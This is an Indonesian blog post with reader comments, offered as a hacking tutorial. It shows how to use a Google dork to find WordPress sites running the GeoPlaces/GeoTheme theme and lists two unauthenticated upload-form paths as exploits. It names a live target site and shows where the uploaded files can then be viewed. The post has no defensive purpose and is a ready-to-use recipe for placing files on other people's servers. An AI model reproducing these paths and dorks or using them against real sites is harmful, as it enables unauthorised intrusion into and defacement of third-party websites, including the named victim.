Nah kali ini saya berbagi teknik baru nih :3 hehe
Ya lumayan lah buat tambahan ilmu gituh :3 / haha
Sebelumnya ucapkan Greetz to Mr. Xenopobic atas pencerahannya
Sytemnya sangat mirip dengan easy comment yang dulu saya pernah share,,
Oke langsung saja deh cekibrot >>
Pertama seperti biasa kita ngandelin Mbah Google
Masukin Dork
#Dork : “inurl:wp-content/themes/GeoPlaces/”
Exploit 1 : wp-content/themes/GeoPlaces/monetize/upload
Exploir 2 :/wp-content/themes/GeoTheme/library/comment-uploads/upload-form.php (recomendasi)
Nah klik aja yang mana aja deh :-D hehe ,,
Kalau vuln bakal ada penampakan seperti ini gan :
Live Target : cy4you.info/wp-content/themes/GeoTheme/library/comment-uploads/upload-form.php
Nah untuk melihat hasilnya :
situs.anu/wp-content/uploads/2014/09/filekamu
Contoh : http://cy4you.info/wp-content/uploads/2014/09/pelurukertas.jpg
Ekstensi suport : file image (jpg , gif , png) dll.
Nah cukup mengerti bukan ,, dan cukup mudah . ^_^
Sekian dari saya terimakasih ,, semoga bermanfaat ^_^
Catatan : jangan sepelekan ilmu , karena sekecil apapun itu gunakanlah untuk hal besar.
Terimakasih telah berkunjung diblog kami , silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^
Info yang patut di bookmark :D
ReplyDeleteTerimakasih telah berkunjung ^_^ dan berkomentar ^_^ naisu (y)
ReplyDelete